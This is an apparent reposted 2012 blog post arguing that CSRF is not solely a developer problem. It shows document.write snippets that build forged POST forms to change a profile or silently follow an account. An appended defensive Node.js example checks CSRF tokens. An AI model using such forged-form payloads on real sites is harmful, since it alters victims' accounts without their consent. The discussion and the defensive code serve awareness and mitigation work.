Thursday, April 05, 2012

A few CSRF-like vulnerable examples.

Remark: Post is published on April 2 (but was expected yesterday) coz Berlin haz no free wifi cause I'm not joking and I figured out that Sunday is the worst day for urgent updates. Well, who cares about the date, enjoy:

I'm trying hard to prove my point that the statement "CSRF is only the developers' problem" is not true. I provided some examples and I want you to check them out. I really appreciate any viewpoint on this problem. Thank you for your attention in advance!

Quick overview:

document.write('<form action="" method=post> <input name="name" value="SUUUUP"><input name="fname" value="SUUUUP"><input name="sname" value="SUUUUP"><input name="birth_day" value="28"><input name="birth_month" value="01"><input name="section" value="basic"><input name="birth_year" value="1991"> </form>')

e.g. changing your profile details. No protection at all.

document.write('<form target=ifr name=pwn method=post action=""></form>')

Makes you follow a certain account without your confirmation. Reported a few weeks ago and fixed.

Deleting a presentation via GET. Commenting w/o confirmation. GET following, etc.
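
A server-side check that would refuse the kinds of requests listed above, as an added example that is not part of the original post. The request shape, the `csrf_token` field name and the session id are assumptions made for illustration:

```javascript
// Added example: server-side CSRF gate (not code from the original post).
const nodeCrypto = require("crypto");

// Assumption: a per-deployment secret; generated at startup here for the demo.
const SERVER_SECRET = nodeCrypto.randomBytes(32);
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Token = HMAC(secret, sessionId), so a page on another origin cannot compute it.
function issueCsrfToken(sessionId) {
  return nodeCrypto.createHmac("sha256", SERVER_SECRET).update(sessionId).digest("hex");
}

function tokenMatches(sessionId, presented) {
  if (typeof presented !== "string") return false;
  const expected = Buffer.from(issueCsrfToken(sessionId));
  const got = Buffer.from(presented);
  // timingSafeEqual throws on length mismatch, so compare lengths first.
  return got.length === expected.length && nodeCrypto.timingSafeEqual(got, expected);
}

// req: { method, sessionId, changesState, body } (hypothetical shape).
function checkRequest(req) {
  const method = String(req.method).toUpperCase();
  if (SAFE_METHODS.has(method)) {
    // A GET that deletes or follows can be triggered by any link or image tag.
    return req.changesState
      ? { allowed: false, reason: "state change over safe method" }
      : { allowed: true, reason: "read-only" };
  }
  if (!tokenMatches(req.sessionId, req.body && req.body.csrf_token)) {
    return { allowed: false, reason: "missing or invalid CSRF token" };
  }
  return { allowed: true, reason: "token verified" };
}

// Constructed sample requests mirroring the cases in the post.
const session = "sess-constructed-1";
const profileFields = { name: "SUUUUP", section: "basic", birth_year: "1991" };
const samples = {
  forgedProfilePost: { method: "POST", sessionId: session, changesState: true, body: { ...profileFields } },
  genuineProfilePost: { method: "POST", sessionId: session, changesState: true,
    body: { ...profileFields, csrf_token: issueCsrfToken(session) } },
  deleteViaGet: { method: "GET", sessionId: session, changesState: true, body: null },
};
for (const [name, req] of Object.entries(samples)) {
  console.log(name, checkRequest(req));
}
```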

Read more: Egor Homakov

Posted via email from Jasper-Net